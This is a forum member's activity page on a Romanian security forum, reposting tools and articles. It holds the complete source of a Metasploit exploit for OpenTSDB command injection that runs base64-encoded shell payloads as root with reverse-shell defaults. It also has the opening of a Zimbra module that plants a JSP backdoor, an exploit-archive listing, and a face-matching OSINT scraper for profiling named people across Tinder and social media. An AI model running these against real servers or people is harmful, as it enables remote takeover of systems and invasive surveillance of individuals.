Jump to content

Kev

Active Members
 View Profile  See their activity

  • Posts

    1026

  • Joined

  • Days Won

    55

 Content Type 

Everything posted by Kev

  1. Kev

    SpyScrap

    Kev posted a topic in Programe utile

    This is an OSINT tool. The main purpose is recolect information from different sources like Google, Tinder, Twitter and more. It combines facial recognition methods to filter the results and uses natural language processing for obtaining important entities from the website the user appears. The tool is able to calculate a final score which indicates the amount of public exposition an user has on the Internet. It has two different modules that can work indepently: CLI and Web Interface. Both modules are built using docker and are easy to deploy. If you like the tool, give us a star! CLI CLI Module for web scraping: Tinder Instagram Yandex Google Facebook BOE Twitter Prerequisites Docker and docker-compose Installation docker build -t spyscrap . docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap [options] You must put the image you want to be used for facial recognition under the shared volume in docker as in the next example: docker run -ti -v /Users/ruthgnz/Documents/osint/SpyScrap/src/data:/spyscrap/data sp -t twitter -n "ruth gonzalez novillo" -i ./data/descarga.jpeg Usage docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap [options] Get Tinder users and store data in sqlite3 database. Tinder Token must be capturen when logging into Tinder App under Local Storage. docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t tinder -k TOKEN Search in google. Add -i to download images and do facial recognition Add -p to only search in an specific site Ex: Linkedin docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath> -p "<Place>" Search twitter profiles docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t twitter -n "<name surname>" -s <number of twitter pages to search> Search facebook profiles Add -i to download images do facial recognition docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t facebook -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag facebook -n "<name surname>" -i <imagePath> Search instagram profiles Add -i to download instagram profile image and do facial recognition docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>" -i <imagePath> Search DNI, Names and Surnames in BOE docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search> -e <boolean> -d <init date> -f <final date> OTHER EXAMPLES: docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t tinder -k TOKEN docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath> -p "<Place>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t twitter -n "<name surname>" -s <number of twitter pages to search> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t facebook -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag facebook -n "<name surname>" -i <imagePath> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>" docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>" -i <imagePath> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search> -e <boolean> -d <init date> -f <final date> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap main.py -t yandex -k <imgur id> -i <imagePath> docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap main.py -t yandex -i <imgUrl> All the results are stored in the docker shared volume you must have configured on your localhost when running the container. The first part is the path for your local folder and you can change it. The second part must be the one in the example (/spyscrap/data) -v /PATH/TO/SpyScrap/src/data:/spyscrap/data Web Interface This is a wrapper for the CLI. Prerequisites Docker and docker-compose Installation cd web docker-compose up Once the images are built, open the browser: http:\\localhost For searching in Tinder you must put the database.db file created using the CLI in the volume inside the folder: SpyScrap\web\data You will also find in this folder the results of all your searches on the web interface. DISCLAIMER This tool is for educational purposes only. Please only use this tool on systems you have permission to access! Ethical use only. Any actions and or activities related to the tools we have created is solely your responsibility. The misuse of the tools we have created can result in criminal charges brought against the persons in question. We will not be held responsible in the event any criminal charges be brought against any individuals misusing the tools we have made to break the law. Authors Ruth González - @RuthGnz Miguel Hernández - @MiguelHzBz Thanks BBVA Next Technologies SecLab Team Feel free to collaborate!! with by @RuthGnz & @MiguelHzBz Download: SpyScrap-master.zip or git clone https://github.com/RuthGnz/SpyScrap.git Source
  2. Kev
    normal https://googlethatforyou.com?q=insite%3Arstforums.com%2Fforum filmeonline.ro
  3. Kev
    modreveal modreveal is a small utility that prints the names of hidden LKMs if any exists. Usage make sudo ./modreveal Notes To test the utility, you can use the Diamorphine rootkit (https://github.com/m0nad/Diamorphine). The author runs Arch Linux LTS kernel, so it is only guaranteed to work on Arch Linux LTS kernel. It will most likely work with your kernel too unless you are running something ancient or really new that breaks something. Dowload: modreveal-master.zip or git clone https://github.com/jafarlihi/modreveal.git Source
  4. Kev
    This Metasploit module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'Shai rod', # @nightrang3r - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-35476'], ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC ], 'DefaultOptions' => { 'RPORT' => 4242 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w[bourne curl wget], 'Targets' => [ [ 'Automatic (Unix In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }, 'Type' => :unix_memory } ], [ 'Automatic (Linux Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }, 'Type' => :linux_dropper } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-11-18', 'DefaultTarget' => 1, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']), ] end def check # sanity check to see if the target is likely OpenTSDB res1 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) unless res1 return CheckCode::Unknown('Connection failed.') end unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB') return CheckCode::Safe('Target is not an OpenTSDB application.') end # get the version via the api res2 = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'api', 'version') }) unless res2 return CheckCode::Unknown('Connection failed.') end unless res2.code == 200 && res2.body.include?('version') return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.') end begin parsed_res_body = JSON.parse(res2.body) rescue JSON::ParserError return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version') return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.') end version = parsed_res_body['version'] begin if Rex::Version.new(version) <= Rex::Version.new('2.4.0') return CheckCode::Appears("The target is OpenTSDB version #{version}") else return CheckCode::Safe("The target is OpenTSDB version #{version}") end rescue ArgumentError => e return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}") end end def select_metric # check if any metrics have been configured. if not, exploitation cannot work res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'suggest'), 'vars_get' => { 'type' => 'metrics' } }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics") end begin metrics = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.') end unless metrics.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array') end if metrics.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible') end # select a random metric since any will do @metric = metrics.sample print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}") end def select_aggregator # check the configured aggregators and select one at random res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'aggregators') }) unless res fail_with(Failure::Unknown, 'Connection failed.') end unless res.code == 200 fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators") end begin aggregators = JSON.parse(res.body) rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.') end unless aggregators.is_a?(Array) fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array') end if aggregators.empty? fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible') end # select a random aggregator since any will do @aggregator = aggregators.sample print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}") end def execute_command(cmd, _opts = {}) # use base64 to avoid special char escape hell (specifying BadChars did not help) cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'" start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S') end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S') get_vars = { 'start' => start_value, 'end' => end_value, 'm' => "#{@aggregator}:#{@metric}", 'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]", 'wxh' => "#{rand(800..1600)}x#{rand(400..600)}", 'style' => 'linespoint' } exploit_uri = '?' get_vars.each do |key, value| exploit_uri += "#{key}=#{value}&" end exploit_uri += 'json' # using a raw request because cgi was leading to encoding issues send_request_raw({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri) }, 0) # we don't have to wait for a reply here end def exploit select_metric select_aggregator if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end end end # 0day.today [2022-12-25] # Source
  5. Kev
    Subscriu la ce zice M4T3!: e.g: Nu te indexeaza: games0nline.ro jocurio#line.com Te pot ajuta, trimite-mi PM
  6. Kev

    Cumpar script remi

    Kev replied to Fantaice's topic in Off-topic

    Il gasesti pe github, Succes!
  7. Kev
    Iar daca specifica sursa?
  8. Kev
    150 free crash courses from the best instructors on YouTube. Click on a topic to begin! 🚀 Skills: Python JavaScript Java PHP Ruby C# C++ Git CS Basics HTML & CSS WordPress Excel SQL APIs Databases AWS Linux Communication Career Tracks: Front-End Dev. Back-End Dev. Mobile Dev. DevOps Data Engineer Data Analyst Data Scientist UX Designer Product Manager Digital Marketer Source: hourups.com
  9. Kev
    asta este exact cum sta treaba cu "gangsterii/traperii" vietii de vorbesc la telefon cu teanc-uri de $ cumparati de pe eBay, dar in realitate sunt vai mortii lor
  10. Kev
    A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer's pipeline, highlighting the risk that insecure software pipelines pose. Source: SeventyFour Images via Alamy Stock Photo An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code. That's according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this "artifact poisoning" weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency. The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory. The problem likely affects a large number of open source projects because maintainers typically will run tests on contributed code before they actually analyze the code themselves, says Liav Caspi, chief technology officer of Legit Security. "It is a common pattern today," he says. "A lot of open source projects today, upon a change request, they run a bunch of tests to validate the request because the maintainer does not want to have to review the code first. Instead, it automatically run tests." The attack takes advantage of the automated build process through GitHub Actions. In the case of the Rust programming language, the vulnerable pattern could have allowed an attacker to execute code in a privileged way as part of the development pipeline, stealing repository secrets and potentially tampering with code, Legit Security said. "To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact," the company stated in its advisory. "Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker." The vulnerability enables an attack similar to the malware-insertion attack that targeted CodeCov and, through that company's software, its downstream customers. "[T]he lack of native GitHub implementation for cross-workflow artifacts communication led many projects and the GitHub Actions community to develop insecure solutions for cross-workflow communication and made this threat highly prevalent," Legit Security stated in the advisory. GitHub confirmed the issue and paid a bounty for the information, while Rust fixed its vulnerable pipeline, Legit Security stated. Source: Legit Security Software Supply Chain Needs Security The vulnerability is the latest security issue to affect software supply chains. Industry and government agencies have increasingly sought to bolster the security of open source software and software provided as a service. In May 2021, for example, the Biden administration released its executive order on Improving the Nation's Cybersecurity, a federal rule that, among other requirements, mandates that the government will require baseline security standards for any software its purchases. On the private industry side, Google and Microsoft have pledged billions of dollars to shore up security in the open source ecosystem, which provides the code that comprises more than three-quarters of the average application's codebase. Logical, But Vulnerable The security issue belongs to a hard-to-find class of problems known as logic issues, which include issues with permissions, the potential for forked repositories to be inserted into a pipeline, and a lack of differentiation between forked and base repositories. Because software projects often use automated scripts to check code submissions before forwarded them to the maintainers, pull requests will be run through automation before any human checks them for malicious code. While the automation saves time, it also should be considered a way for attackers to insert malicious code into the pipeline. "When you are doing open source development, the problem is bigger, because you are accepting contribution from anyone in the world," Caspi says. "You are executing things that you cannot trust." GitHub acknowledged the issue and expanded the ways of excluding submissions from outside collaborators from being automatically inserted into the Actions pipeline. The company updated its GetArtifact and ListArtifacts APIs with the goal of providing more information to help determine whether an artifact can be trusted. "Anyone that does anything like the Rust project did — trusting the input from a third party — then they are still vulnerable," Caspi says. "It is a logic problem. GitHub just made it easier to write a safer script." Via darkreading.com
  11. Kev
    This archive contains all of the 69 exploits added to Packet Storm in November, 2022. Content: Directory of \2211-exploits 12/03/2022 05:06 PM <DIR> . 12/03/2022 05:06 PM <DIR> .. 11/02/2022 05:06 PM 9,286 apache_couchdb_erlang_rce.rb.txt 11/03/2022 02:29 PM 853 atg_client.py.txt 11/11/2022 03:21 PM 608 avevaiaasg2020R2-traversal.txt 11/21/2022 06:05 PM 2,412 boa09414-bypass.txt 11/21/2022 06:16 PM 9,623 churchinfo_upload_exec.rb.txt 11/15/2022 06:48 PM 7,019 ciscoseg-bypass.txt 11/21/2022 05:08 PM 2,003 clicshopping3402-xss.txt 11/29/2022 06:02 PM 11,611 concretecms913-xpath.txt 11/11/2022 03:16 PM 1,948 cvat20-ssrf.txt 11/21/2022 05:51 PM 72,940 CVE-2020-1493.tgz 11/21/2022 05:57 PM 64,952 CVE-2020-16947.tgz 11/30/2022 11:16 PM 348,622 CVE-2022-41412.tgz 11/30/2022 11:16 PM 687,025 CVE-2022-41413.tgz 11/24/2022 04:10 PM 4,299 ecommerce10-xssredirect.txt 11/30/2022 10:52 PM 8,957 exchange_proxynotshell_rce.rb.txt 11/24/2022 04:13 PM 5,064 f5_icontrol_rpmspec_rce_cve_2022_41800.rb.txt 11/02/2022 05:04 PM 4,135 flir_ax8_unauth_rce_cve_2022_37061.rb.txt 11/09/2022 03:16 PM 3,080 formaspotlms321-xss.txt 11/17/2022 03:31 PM 8,294 gitea_git_fetch_rce.rb.txt 11/04/2022 03:37 PM 50,046 GS20221104133541.txt 11/07/2022 05:15 PM 24,039 GS20221107151324.tgz 11/08/2022 03:54 PM 13,445 GS20221108135354.tgz 11/10/2022 03:35 PM 6,982 GS20221110133351.tgz 11/10/2022 03:41 PM 7,183 GS20221110133825.tgz 11/10/2022 03:46 PM 6,668 GS20221110134348.tgz 11/14/2022 06:50 PM 4,276 GS20221114164850.tgz 11/14/2022 06:52 PM 4,745 GS20221114165129.txt 11/14/2022 06:54 PM 4,696 GS20221114165410.tgz 11/18/2022 04:17 PM 111,390 GS20221118141708.tgz 11/18/2022 04:22 PM 11,505 GS20221118141944.tgz 11/25/2022 05:50 PM 4,259 GS20221125155014.tgz 11/25/2022 05:53 PM 3,717 GS20221125155355.tgz 11/25/2022 05:58 PM 5,768 GS20221125155537.tgz 11/30/2022 10:40 PM 5,509 hirschmannbatc2-exec.txt 11/25/2022 06:03 PM 2,041 hss10-sql.txt 11/16/2022 05:58 PM 2,847 idm641-execmitm.txt 11/11/2022 03:14 PM 1,250 iotransfer4-unquotedpath.txt 11/11/2022 03:23 PM 3,216 msnswitchmnt2408-exec.txt 11/10/2022 03:43 PM 5,772 MVID-2022-0653.txt 11/10/2022 03:37 PM 2,427 MVID-2022-0654.txt 11/14/2022 06:47 PM 2,056 MVID-2022-0655.txt 11/16/2022 06:02 PM 5,542 MVID-2022-0656.txt 11/21/2022 05:06 PM 2,953 MVID-2022-0657.txt 11/21/2022 05:19 PM 2,034 MVID-2022-0658.txt 11/23/2022 05:16 PM 4,808 MVID-2022-0659.txt 11/25/2022 06:11 PM 2,263 MVID-2022-0660.txt 11/25/2022 06:05 PM 3,811 MVID-2022-0661.txt 11/25/2022 06:09 PM 1,875 MVID-2022-0662.txt 11/11/2022 03:13 PM 8,631 owa173-exec.txt 11/30/2022 10:44 PM 10,167 OXUIB-1654.txt 11/16/2022 06:13 PM 1,863 rcs10-sqlexec.py.txt 11/16/2022 06:17 PM 1,969 rcs10-xssbypass.txt 11/21/2022 06:10 PM 3,700 roxy-fileman_upload.py.txt 11/15/2022 06:51 PM 14,981 SA-20221109-0.txt 11/15/2022 06:55 PM 8,873 SA-20221110-0.txt 11/15/2022 06:57 PM 8,165 SA-20221114-0.txt 11/04/2022 03:34 PM 1,621 slms950-sql.txt 11/11/2022 03:18 PM 1,462 smartrgsr510n2613-exec.txt 11/25/2022 06:02 PM 1,724 smsphp10-sql.txt 11/28/2022 05:49 PM 4,299 vbulletin552-exec.txt 11/15/2022 06:42 PM 5,627 vmware_nsxmgr_xstream_rce_cve_2021_39144.rb.txt 11/02/2022 05:02 PM 5,382 webmin_file_manager_rce.rb.txt 11/15/2022 06:50 PM 3,306 wpbecustom1052-xsrf.txt 11/21/2022 05:24 PM 4,907 wpbetheme26514-deserialize.txt 11/09/2022 03:42 PM 7,879 wpblog2social6911-bypass.txt 11/21/2022 05:31 PM 1,101 zteh108ns-bypass.txt 11/21/2022 05:11 PM 1,563 zteh108ns-overflow.txt 67 File(s) 1,657,074 bytes 2 Dir(s) 2,291,347,456 bytes free Download: 202211-exploits.tgz (1.4 MB) Source
  12. Kev
    Listen to college radio stations FAQ I don’t see my college radio station. Can you add it? Absolutely! It’s pretty easy for me to add new stations, and I’m always looking for new radio stations to listen to. Feel free to suggest stations via this form! What does it mean if a station is grayed out? If a station card is gray, that means the app is still loading its corresponding audio stream. It should be ready to play soon! Why do the stations periodically turn gray? In order to smoothly switch between streams, Campus FM keeps a small cache of audio data available for each station. After some time has passed, the cached audio gets stale and the app requests more recent content. The station is grayed out during this loading period. I've been waiting for a while now, why isn't my station loading? IT practices aren't consistent across all college radio stations. Sometimes they have security restrictions that prevent their audio streams from loading on certain apps and devices. And sometimes the audio streams just go offline for a while. The app isn’t working on my device / I’ve spotted a bug / I’d like to see [insert feature here]. That’s awesome (or I’m sorry)! I’m still learning how to build web apps and I would love your feedback! If you have a Github account, you can open an issue directly on the Campus FM repo, or you can get in touch with me at hello.campusfm@gmail.com Can I get Campus FM on my phone/tablet? I’m working on native apps for iOS and Android! URL: https://www.campus-fm.com Source: github.com
  13. Kev
    Feep! search (alpha) About Feep! search is a web search engine, focused on programming resources. It uses an independent index, currently totalling a bit over 29 million pages. (That’s slightly more than Google’s first index in 1998!) Result quality is rather variable, mainly because I haven’t tuned the ranking very well yet. See about Feep! search for more information. URL: https://search.feep.dev Source: github.com
  14. Kev
    Nu mi-e lene, majoritatea au PUA/Generic etc... 7/36 in virustotal Edit: nu inteleg cum trimite SMS de confirmare din moment ce nu are SIM, nici WiFi, iar programele mentionate ^ nu rezolva nimic, am reusit sa intru in el prin Smart Switch
  15. Kev
    @mannnu in primul video indianul cere 2k, 3k, mai mult decat telefonul, il folosesc pentru uz personal al II-lea video nu ma intereseaza, il vreau ca din fabrica, daca nu il predau. Multumesc oricum
  16. Kev
    Salut Am primit cadou un telefon de la o bătrânică, Samsung Grand Prime (nu stiu modelul) nu pot accesa meniul, am incercat cu Hard Reset, nimic, am incercat cu software-uri insa toate au PUA/Generic etc... Cum il poate aduce in starea din fabribricatie? Doarme cand o sun sa-mi trimita G-xxx, am incercat ore Edit/ Model: Samsung sm-g531f Edit// Am incercat si cu Odin, nu gasesc Firmware, baba nu stie password-ul de la e-mail, incerc sa-i dau un Flash Multumesc
  17. Kev
    Simple C++ Encryption and Steganography tool that uses Password-Protected-Encryption to secure a file's contents, and then proceeds to embed it insde an image's pixel-data using Least-Significant-Bit encoding. For Linux based systems. Encoding: $ ./steganography encode -i data/orig.png -e data/jekyll_and_hyde.zip -o output.png Password: 1234 * Image size: 640x426 pixels * Encoding level: Low (Default) * Max embed size: 132.38 KiB * Embed size: 61.77 KiB * Encrypted embed size: 61.78 KiB * Generated CRC32 checksum * Generated encryption key with PBKDF2-HMAC-SHA-256 (20000 rounds) * Encrypted embed with AES-256-CBC * Embedded jekyll_and_hyde.zip into image * Sucessfully wrote to output.png Original image: Image with embedded ZIP containg the entire contents of the book "Dr Jekyll and Mr Hyde": Decoding: $ ./steganography decode -i output.png -o "out - jekyll_and_hyde.zip" Password: 1234 * Image size: 640x426 pixels * Generated decryption key with PBKDF2-HMAC-SHA-256 (20000 rounds) * Sucessfully decrypted header * File signatures match * Detected embed jekyll_and_hyde.zip * Encoding level: Low (Default) * Encrypted embed size: 61.78 KiB * Successfully decrypted the embed * Decrypted embed size: 61.77 KiB * CRC32 checksum matches * Successfully wrote to out - jekyll_and_hyde.zip Building: $ mkdir build $ cd build $ cmake -DCMAKE_BUILD_TYPE=Release .. $ make -j 4 Usage: Usage: steganography [-h] {decode,encode} Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits Subcommands: decode Decodes and extracts an embed-file from an image encode Encodes an embed-file into an image Encoding: Usage: encode [-h] --input VAR --output VAR --embed VAR [--passwd VAR] Encodes an embed-file into an image Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits -i, --input specify the input image. [required] -o, --output specify the output image. [required] -e, --embed specify the file to embed. [required] -p, --passwd specify the encryption password. Decoding: Usage: decode [-h] --input VAR [--output VAR] [--passwd VAR] Decodes and extracts an embed-file from an image Optional arguments: -h, --help shows help message and exits -v, --version prints version information and exits -i, --input specify the input image. [required] -o, --output specify the output file. [default: ""] -p, --passwd specify the encryption password. Theory Of Operation Encoding The program operates by first randomly generating a 128-bit Password Salt and a 128-bit AES Initialization Vector by reading binary data from /dev/urandom. It then uses that Password Salt as a parameter in generating an encryption key, by using PBKDF2-HMAC-SHA-256 on a user inputted string. A CRC32 hash of the file to embed is then calculated, and stored in the header to act as a checksum for the validity of the data. It then pads the binary data of the file to embed using the PKCS #7 algorithm, followed by actually encrypting both the header and the padded data, with AES-256 in CBC Mode, using the previously generated Initialization Vector. Now the data is actually encoded inside the image by first picking a random offset, and then going through each bit of data and storing it inside the actual image pixel data, which it accomplishes by setting the Least-Significant-Bit of each channel byte of each pixel. Decoding The decoding process works exactly the same as the encoding process previously described above, just in reverse. The only difference is that for decoding, after the program attempts to extract and decrypt the data, it compares some of the information in the header section in an attempt to validate the extraction process. The header fields which are compared are: The 4 byte file signature custom to this program, and the CRC32 hash of the decrypted data. If any of these fields do not match to their correct values, the decryption process will fail. This should only happen if the file which you were attempting to decrypt does not actually contain an embed, if the password you entered is wrong, or if the image file was somehow corrupted. Detection While the detection of data being embedded in an image is a trivial task, theoretically there is no way of knowing that it was this program that did it, and theoretically there should be no known way to decrypt the data without knowing the password, that is without spending millions of years in the process of doing so. Disclaimer Do not use this program to encrypt and hide important data which you wish to keep away from prying eyes. This is just a simple proof-of-concept program that I made for fun. I'm no cryptographer. I'm just a hobbyist, use at your own risk. Copyright This software is licensed under MIT. Copyright © 2022 Zach Collins Download: steganography-main.zip or git clone https://github.com/7thSamurai/steganography.git Source
  18. Kev
    Project two years in the making aims to improve public services... or what's left of them It's pork barrel time again. The UK government has named a slew of tech organizations that made it onto a £2 billion framework agreement that allows them to compete for big data and analytics public sector contracts. The Cabinet Office-run Crown Commercial Service (CCS), which sets up procurement on behalf of government ministries and other public sector organizations, ran the process and awarded contracts to many of the usual suspects and some lesser known entities (see box). According to the contract award notice, the government sees big data and analytics as an emerging and evolving capability, "with its prominence heightened by COVID." It claims the technology is "fast becoming recognised as business critical and a core business function, with many government departments now including chief data officers." The notice says the procurement is required in part to support the National Data Strategy, a set of proposals for post-Brexit legislation which include changes to the remit of the Information Commissioners Office, the data privacy watchdog. The procurement notice said the contracted suppliers, which are set to vie for business on framework, could help with the implementation of the government's "missions to reinforce the requirement to access and interrogate Government data more effectively to improve public services." The government has taken more than a year to select the winning suppliers. It first announced plans to create the framework deal — a means of offering suppliers an indicative spending figure in exchange for structured pricing and preparedness for the work — in September last year, with a contract notice launching the competition following in November. The framework is divided into two lots. The first looks for suppliers to design, build, and run professional services; the second is for commercial off-the-shelf software. Launched in December 2020 by minister Oliver Dowden, the National Data Strategy talks of a "pro-growth and trusted data regime" that can transform the government's use of data and drive efficiency and so on. "Data is a non-depletable resource in theory, but its use is limited by barriers to its access – such as when data is hoarded, when access rights are unclear or when organisations do not make good use of the data they already have. These barriers undermine the performance of public services and our economy, risking poorer outcomes for citizens. We will ensure that data can be leveraged to deliver new and innovative services, promote stronger competition, and better prices and choice for consumers and small businesses," promised Dowden at the launch of the consultation. ® Via theregister.com
  19. Kev

    192.168.1.1

    Kev replied to .RUDY's topic in Discutii incepatori

    Joaca-te pe la def.camp, sunt o multitudine de challeges aici
  20. Kev
    This Metasploit module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command-line utility that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions Zimbra Collaboration Suite 9.0.0 Patch 26 and below and Zimbra Collaboration Suite 8.8.15 Patch 33 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'TAR Path Traversal in Zimbra (CVE-2022-41352)', 'Description' => %q{ This module creates a .tar file that can be emailed to a Zimbra server to exploit CVE-2022-41352. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in the cpio command- line utlity that can extract an arbitrary file to an arbitrary location on a Linux system (CVE-2015-1197). Most Linux distros have chosen not to fix it. This issue is exploitable on Red Hat-based systems (and other hosts without pax installed) running versions: * Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier) * Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier) The patch simply makes "pax" a pre-requisite. }, 'Author' => [ 'Alexander Cherepanov', # PoC (in 2015) 'yeak', # Initial report 'Ron Bowes', # Analysis, PoC, and module ], 'License' => MSF_LICENSE, 